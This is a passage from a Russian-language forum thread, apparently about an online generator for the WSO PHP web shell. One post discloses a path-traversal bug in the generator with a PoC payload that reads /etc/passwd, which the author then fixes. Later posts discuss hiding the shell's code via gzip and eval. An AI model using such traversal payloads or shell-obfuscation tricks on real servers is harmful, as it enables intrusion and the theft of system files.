Старый 26.07.2012, 15:09   #21
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Там таки читалка файлов присутствует)
/index.php:
PHP код:
[...]
    
$a_actions 'array(';
    foreach(
$_POST['action'] as $key=>$val) {
        if (isset(
$_POST['action'][$key])) {
            
$a_actions .= "'".$val."'=>'".$val."',";
            
$PACK .= ' '.file_get_contents('actions'.DIRECTORY_SEPARATOR.$val.'.wso');
        }
    }
[...] 
PoC:
Код:
action[]=../../../../etc/passwd%00
Получаем WSO+/etc/passwd
P.S. ТС уже осведомлен, баг пофиксили.
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 26.07.2012, 15:29   #22
Svet
 
Аватар для Svet
 
Регистрация: 11.09.2010
Сообщений: 172
Репутация: 42
По умолчанию

Да. Баг был. И в онлайн-версии тоже. Boolean, спасибо, что сообщил о нем. Ссылки в верхних собщениях я обновил.
Svet вне форума   Ответить с цитированием
Старый 20.11.2013, 13:33   #23
Wild
 
Регистрация: 20.11.2013
Сообщений: 4
Репутация: 0
По умолчанию

Hеплохо было бы в качестве шифрования сделать gzip c доставанием евал данных из gzip оверлея.
Типа как была попытка здесь, но у меня чё-то не сработало.

Последний раз редактировалось Wild; 20.11.2013 в 14:47..
Wild вне форума   Ответить с цитированием
Старый 08.12.2013, 07:16   #24
shampoo
 
Регистрация: 30.10.2013
Сообщений: 10
Репутация: 1
По умолчанию

Цитата:
Сообщение от Wild Посмотреть сообщение
Hеплохо было бы в качестве шифрования сделать gzip c доставанием евал данных из gzip оверлея.
Типа как была попытка здесь, но у меня чё-то не сработало.
а ты просто magic_quotes выруби на сервере, а то при посте данных кавычки заковычиваются, вот и не получилось.
shampoo вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot